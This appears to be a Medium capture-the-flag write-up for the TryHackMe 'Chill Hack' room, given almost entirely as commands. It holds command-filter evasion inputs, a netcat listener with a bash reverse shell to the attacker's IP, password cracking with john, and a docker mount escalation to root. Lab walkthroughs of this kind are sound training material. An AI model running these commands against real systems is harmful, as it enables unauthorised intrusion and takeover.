Chill Hack — TryHackMe — WriteUp

nmap -A -T4 -p- -v <ip>

nmap

ftp <ip>

FTP

1/ 2 names: Anurodh and Apaar

2/ Input filtering of “command”

website

gobuster dir -u http://<ip>/ -w /path-to-wordlist

gobuster
/secret
ls -al
pwd
l\s -al

c\a\t index.php

c\at index.php
index.php

nc -lvnp 4444

/bin/bash -c ‘/bin/bash -i >& /dev/tcp/<your-VPN-ip>/4444 0>&1’

reverse shell

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

sudo -l

sudo -u apaar /home/apaar/.helpline.sh

script content
apaar shell
local.txt
sudo -l
/var/www
files
hacker.php
index.php

mysql -u root -p

mysql login
images

steghide extract -sf hack….jpg

steghide

zip2john backup.zip > backupjohn.txt

john — wordlist=rockyou.txt backupjohn.txt

john
source_code.php

docker run -v /:/mnt — rm -it alpine chroot /mnt sh

root shell
root flag

HAPPY HACKING

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store